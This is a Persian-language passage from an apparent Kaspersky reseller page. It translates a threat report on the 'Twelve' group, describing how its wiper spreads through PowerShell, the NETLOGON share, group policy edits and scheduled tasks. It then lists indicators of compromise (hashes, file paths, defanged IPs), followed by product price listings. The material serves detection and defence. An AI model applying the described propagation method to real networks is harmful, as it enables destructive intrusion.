الگوی پخش وایپر در زیرساخت قربانی تقریباً تفاوتی با الگوی باج افزار ندارد. دشمن از PowerShell برای کپی کردن فایل پاک کن در اشتراک شبکه نت لاگ استفاده نموده  و سپس اسکریپتی را اجرا می‌کند که خط مشی‌های گروه را تغییر داده و وظایف برنامه‌ریزی شده را ایجاد می‌کند. سپس وایپر از اشتراک شبکه نت لاگ در پوشه محلی ProgramData در تمام رایانه‌های دامنه رمزگذاری شده قبلی کپی می‌شود. پس از این، یک کار برنامه ریزی شده شروع می‌شود و وایپر را اجرا نموده که داده‌های دستگاه را از بین می برد.

اهداف

اهداف استراتژیک عامل تهدید:

  • از بین بردن دارایی‌های حیاتی و مختل کردن کسب و کار؛
  • سرقت اطلاعات حساس؛
  • بی‌اعتبار کردن قربانیان با گزارش دستکاری در کانال تلگرام مهاجمین

برداشت‌ها

دوازده بیشتر از اینکه به دنبال آورده مالی باشد درگیر ماجرای هک بود. این نشان‌دهنده شیوه کاری‌اش است: به جای درخواست باج برای رمزگشایی داده، دوازده ترجیح ی‌دهد داده‌های قربانی را رمزگذاری کرده و بعد زیرساخت آن‌ها را با وایپر خراب کند تا جلوی ریکاوری گرفته شود. این رویکرد نشانگر علاقه دوازده به ایجاد بالاترین حد خسارت به سازمان هدف است بدون اینکه ذره‌ای پای سود مستقیم مالی در میان باشد. تجزیه و تحلیل ما همچنین نشان می‌دهد که این گروه به زرادخانه‌ای از ابزارهای بدافزاری که در دسترس عموم و آشنا هستند، پایبند است، که نشان می‌دهد هیچ‌کدام از آنها را نمی‌سازد. این امر تشخیص و جلوگیری از حملات Twelve را در زمان مناسب ممکن می‌سازد. عدم انجام این کار می‌تواند منجر به آسیب دیدن زیرساخت های سازمان از سوی عامل تهدید شود.

شاخص‌های دستکاری

وب‌شل‌ها

05d80c987737e509ba8e6c086df95f7d
48b2e5c49f121d257b35ba599a6cd350
5dcd02bda663342b5ddea2187190c425
97aac7a2f0d2f4bdfcb0e8827a111524
dad076c784d9fcbc506c1e614aa27f1c
ecb14e506727ee67220e87ced2e6781a
f8da1f02aa64e844770e447709cdf679

Mimikatz

e930b05efe23891d19bc354a4209be3e

اسکریپت‌ها

7a7c0a521b7596318c7cd86582937d98
72830102884c5ebccf2afbd8d9a9ed5d
31014add3cb96eee557964784bcf8fde
7dfa50490afe4553fa6889bdafda7da2

Ngrok
43b3520d69dea9b0a27cce43c1608cad

Cobalt Strike
7bec3c59d412f6f394a290f95975e21f

Ransomware
9c74401a28bd71a87cdf5c17ad1dffa5      
d813f5d37ab2feed9d6a2b7d4d5b0461      
646a228c774409c285c256a8faa49bde      
5c46f361090620bfdcac6afce1150fae      
9bd78bcf75b9011f9d7a9a6e5aee5bf6      
f90e95b9fcab4c1b08ca06bc2c2d6e40      
39b91f5dfbbec13a3ec7cce670cf69ad     

وایپر
4bff90a6f7bafc8e719e8cab87ab1766      

مسیرهای فایل
C:\ProgramData\sed.exe
C:\Users\{username}\Downloads\sed.exe
C:\Users\{username}\Desktop\sed.exe
C:\programdata\svchost\svchost.exe
C:\programdata\svchost\svchost.yml
C:\Users\{username}\AppData\Local\CEF\User Data\Dictionaries\svchost.exe
C:\Users\{username}\AppData\Local\CEF\User Data\Dictionaries\svchost.yml
C:\Users\{username}\Desktop\svchost.exe
C:\Users\{username}\Desktop\svchost.yml
C:\users\{username}\pictures\photos_delo\loop.exe
C:\users\{username}\downloads\chisel_1.9.1_windows_amd64\chisel.exe
C:\Users\{username}\Documents\PowerView.ps1
C:\Users\{username}\Documents\calculator.exe
C:\Windows\qbkLIdag.exe
C:\Windows\System32\Tasks\run
C:\Windows\System32\Tasks\Update Microsoft
C:\Windows\System32\Tasks\Yandex
C:\Windows\System32\Tasks\YandexUpdate
C:\Windows\SYSVOL\domain\scripts\intel.exe
C:\Windows\SYSVOL\domain\scripts\outlookconf2003.ps1
C:\Windows\SYSVOL\domain\scripts\ZZZZZZ
C:\Windows\SYSVOL_DFSR\domain\scripts\intel.exe
\\[DOMAIN]\netlogon\12.exe
\\[DOMAIN]\netlogon\outlookconf2003.ps1
\\[DOMAIN]\netlogon\intel.exe
C:\123\12.exe
C:\ProgramData\intel.exe
C:\Users\Public\46a2209036e6282c45f8dfd3f046033d.ps1
C:\Users\Public\gpo.ps1
C:\Windows\Logs\PsExec.exe

دامنه‌ها و آی‌پی‌ها
212.109[.]217.88
195.2[.]79.195
109.205[.]56.229
193.110[.]79.47
195.2[.]79.195
217.148[.]143.196
5.8[.]16.147
5.8[.]16.148
5.8[.]16.149
5.8[.]16.169
5.8[.]16.170
5.8[.]16.236
5.8[.]16.238
79.137[.]69.34
85.204[.]124.94
89.238[.]132.68
89.33[.]8.198
91.90[.]121.220

 

[1] confidentiality, integrity and availability

کسپرسکی آنلاین (ایدکو)

کسپرسکی اسم یکی از بزرگترین شرکتهای امنیتی و سازنده آنتی ویروس است که برخی از کاربران اشتباهاً این شرکت و محصولات آنتی ویروس آن را با عناوینی نظیر کسپرسکای،کاسپرسکی، کسپراسکای، کسپراسکای، و یا کاسپراسکای نیز می‌شناسد. همچنین لازم به ذکر است مدیرعامل این شرکت نیز یوجین کسپرسکی نام دارد.

 

 

 

محصولات مرتبط

  • Kaspersky Internet Security for Android

    امنیت پیشرفته‌ای که همیشه همراه شماست بخش مهمی از زندگی اکثر ما اکنون روی گوشی‌ها و تبلت‌هاست- پس به امنیت موبایلی نیاز دارید که شما را همیشه امن نگه ...

    7,500,350 ریال
    خرید
  • Kaspersky Cloud Password Manager

    Kaspersky Cloud Password Manager ابزار مدیریت کلمه عبور ابری کسپرسکی (KCPM) ضمن ذخیره ایمن تمامی کلمات عبور مورد استفاده شما برای وبسایت‌ها، اپلیکیشن‌ها، و شبکه‌های اجتماعی آنها را در تمامی ...

    11,254,100 ریال
    خرید
  • Kaspersky Safe Kids

    اپلیکیشن همه‌کاره برای فرزندپروریِ دیجیتال و سلامت خانواده نرم افزار امنیت کودکان کسپرسکی، نظارت‌های والدین را آسان می‌کند. ردیابی مکان و عادات دستگاه، محدودسازی محتوا، متعادل‌سازی ...

    1,125,410 ریال11,254,100 ریال
    خرید
  • Kaspersky Security Cloud Personal

    تمام اپ‌های امنیتیِ ما در دستانتان. به کل خانواده‌ی اپ‌های ما برای دسکتاپ و موبایل دسترسی پیدا کنید. از آنتی‌ویروس گرفته تا ابزارهای حریم خصوصی و اجرایی، هر کدام را به میل ...

    75,067,850 ریال
    خرید
  • Kaspersky Standard

    سیستم امنیتی بهبودیافته به همراه تقویت‌کننده عمکرد دستگاه طرح امنیتی استاندارد ما، نه تنها سیستم امنیتی قدرتمندی را برای انواع ویروس‌ها، بدفزارها و باج‌افزارها ارائه می‌دهد ...

    10,617,750 ریال21,235,500 ریال
    خرید
  • Kaspersky Plus

    امنیت. کارایی. حریم خصوصی. همه در یک برنامه با کاربری آسان کسپرسکی پلاس با ارائه امنیت سایبری نسل بعد، شما در برابر ویروس‌ها، باج‌افزارها و بدافزارهای جدید محافظت کند - بدون ...

    15,225,925 ریال30,451,850 ریال
    خرید
  • Kaspersky Premium

    حفاظت کامل از دستگاه ها، حریم خصوصی و هویت شما با محصول Kaspersky Premium تمام نیازهای امنیتی خود و خانواده‌تان را پوشش دهید. حفاظت پیشرفته ...

    16,287,700 ریال32,575,400 ریال
    خرید
  • Kaspersky Small Office Security

    محافظت در حین کار Kaspersky Small Office Security به طور خاص برای سازمان‌هایی طراحی شده است که 5 تا 50 دستگاه کامپیوتر در خود جای داده‌اند. نصب آن بسیار آسان است؛ مدیریت آن ...

    67,563,925 ریال135,127,850 ریال
    خرید
  • Kaspersky Small Office Security

    امنیت ادارات کوچک

    216,208,850 ریال
    خرید
  • Kaspersky Small Office Security

    امنیت ادارات کوچک

    81,077,425 ریال162,154,850 ریال
    خرید
  • Kaspersky Small Office Security

    259,752,350 ریال
    خرید
  • Kaspersky Small Office Security

    94,590,925 ریال189,181,850 ریال
    خرید
  • Kaspersky Small Office Security

    302,545,100 ریال
    خرید
  • Kaspersky Small Office Security

    108,104,425 ریال216,208,850 ریال
    خرید
  • Kaspersky Small Office Security

    346,088,600 ریال
    خرید
  • Kaspersky Small Office Security

    121,617,925 ریال243,235,850 ریال
    خرید
  • Kaspersky Small Office Security

    388,881,350 ریال
    خرید
  • Kaspersky Small Office Security

    123,870,175 ریال247,740,350 ریال
    خرید
  • Kaspersky Small Office Security

    396,388,850 ریال
    خرید
  • Kaspersky Small Office Security

    174,545,800 ریال349,091,600 ریال
    خرید
  • Kaspersky Small Office Security

    558,550,850 ریال
    خرید
  • Kaspersky Small Office Security

    225,221,425 ریال450,442,850 ریال
    خرید
  • Kaspersky Small Office Security

    720,712,850 ریال
    خرید
  • Kaspersky Small Office Security

    272,143,300 ریال544,286,600 ریال
    خرید
  • Kaspersky Small Office Security

    870,862,850 ریال
    خرید
  • Kaspersky Small Office Security

    516,137,050 ریال1,032,274,100 ریال
    خرید
  • Kaspersky Small Office Security

    1,651,642,850 ریال
    خرید

نظر خودتان را ارسال کنید


کاربر گرامی چنانچه تمایل دارید، نقد یا نظر شما به نام خودتان در سایت ثبت شود، لطفاً وارد سایت شوید.
*نظر
کلیه حقوق مادی و معنوی این سایت محفوظ و متعلق به شرکت گسترش خدمات تجارت الکترونیک ایرانیان است و هر گونه کپی برداری از آن پیگرد قانونی دارد